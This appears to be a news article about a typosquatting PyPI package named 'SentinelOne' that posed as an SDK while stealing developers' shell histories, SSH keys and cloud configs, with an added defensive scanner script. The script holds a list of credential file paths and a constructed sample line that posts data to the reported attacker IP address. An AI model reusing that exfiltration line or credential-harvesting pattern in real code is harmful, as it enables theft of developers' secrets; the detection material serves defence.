Researchers discovered criminals spoofing a well-known cybersecurity firm in an attempt to steal data from software developers.
ReversingLabs researchers recently discovered a malicious Python package called "SentinelOne" on PyPI.
The package, named after a well-known cybersecurity firm in the United States, masquerades as a legitimate SDK client, enabling easy access to the SentinelOne API from within a separate project.
However, the package also includes "api.py" files that contain malicious code and allow threat actors to steal sensitive data from developers and send it to a third-party IP address (54.254.189.27).
Bash and Zsh histories, SSH keys, .gitconfig files, hosts files, AWS configuration information, Kube configuration information, and other data are being stolen.
According to the publication, these folders typically store auth tokens, secrets, and API keys, granting threat actors additional access to target cloud services and server endpoints.
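A practical check that follows from the description above is to audit a downloaded package's sources before installing it, looking for the combination the article describes: references to credential-bearing files together with a way to send data to a hard-coded address. The script below is an added example, not code from the article or from ReversingLabs; the path list mirrors the files the article names, the two embedded samples are constructed for illustration (they are not the real package's code), and the address in the first sample is the one the article reports.

```python
import re
from pathlib import Path

# Indicators to look for in a package's Python sources. The sensitive-path list
# mirrors the files the article says were targeted; the IP regex catches any
# hard-coded IPv4 literal, since a legitimate SDK normally talks to a hostname.
SENSITIVE_PATHS = (
    ".bash_history", ".zsh_history", ".ssh", ".gitconfig",
    "/etc/hosts", ".aws", ".kube",
)
NETWORK_CALLS = ("requests.post", "requests.put", "urlopen", "socket.connect", "http.client")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def scan_source(text: str) -> dict:
    """Collect indicators from the text of one Python source file."""
    return {
        "sensitive_paths": sorted(p for p in SENSITIVE_PATHS if p in text),
        "network_calls": sorted(c for c in NETWORK_CALLS if c in text),
        "ip_literals": sorted(set(IPV4_RE.findall(text))),
    }


def is_suspicious(findings: dict) -> bool:
    """Flag only the combination: touches credential files AND has a way to send them out.

    Either half alone is common in benign code (a backup tool reads ~/.ssh, an
    SDK posts JSON), so the pairing is what separates an exfiltration module
    from an ordinary API client.
    """
    return bool(findings["sensitive_paths"]) and bool(
        findings["network_calls"] or findings["ip_literals"]
    )


def scan_tree(root: Path) -> dict:
    """Scan every .py file under an unpacked sdist/wheel; return {relative path: findings} for flagged files."""
    flagged = {}
    for py in root.rglob("*.py"):
        findings = scan_source(py.read_text(errors="replace"))
        if is_suspicious(findings):
            flagged[str(py.relative_to(root))] = findings
    return flagged


# Constructed samples (not the real package's code) showing what the check flags.
SAMPLE_MALICIOUS = '''
import os, requests
TARGETS = ["~/.bash_history", "~/.ssh", "~/.gitconfig", "~/.aws", "~/.kube"]
def send(payload):
    requests.post("http://54.254.189.27/upload", data=payload)
'''
SAMPLE_BENIGN = '''
import requests
class Client:
    def __init__(self, token):
        self.session = requests.Session()
        self.session.headers["Authorization"] = "ApiToken " + token
    def agents(self):
        return self.session.get("https://example.invalid/web/api/v2.1/agents").json()
'''

if __name__ == "__main__":
    for name, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        f = scan_source(src)
        print(name, "-> suspicious" if is_suspicious(f) else "-> clean", f)
```

Run `scan_tree(Path("path/to/unpacked-package"))` on a package downloaded with `pip download --no-deps --no-binary :all: <name>` and extracted, before any `pip install`; a flagged file is a reason to read it by hand, not proof of malice, and a clean result only means these particular strings were absent, so obfuscated or base64-encoded paths will still need manual review.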
Worse, the package does provide the functionality developers expect. It is in effect a hijacked package: unsuspecting developers can use it normally and become victims without ever noticing. The good news is that ReversingLabs confirmed the package's malicious intent and had it removed from the repository after reporting it to SentinelOne and PyPI.
The malicious actors were very active in the days and weeks leading up to the removal. The package was first submitted to PyPI on December 11 and was updated 20 times in less than a month. The researchers found that one of the issues fixed by an update was the inability to exfiltrate data from Linux systems.
The researchers concluded that it is difficult to say whether anyone fell for the scam because there is no evidence that the package was used in an actual attack. Nonetheless, all of the published versions were downloaded over 1,000 times.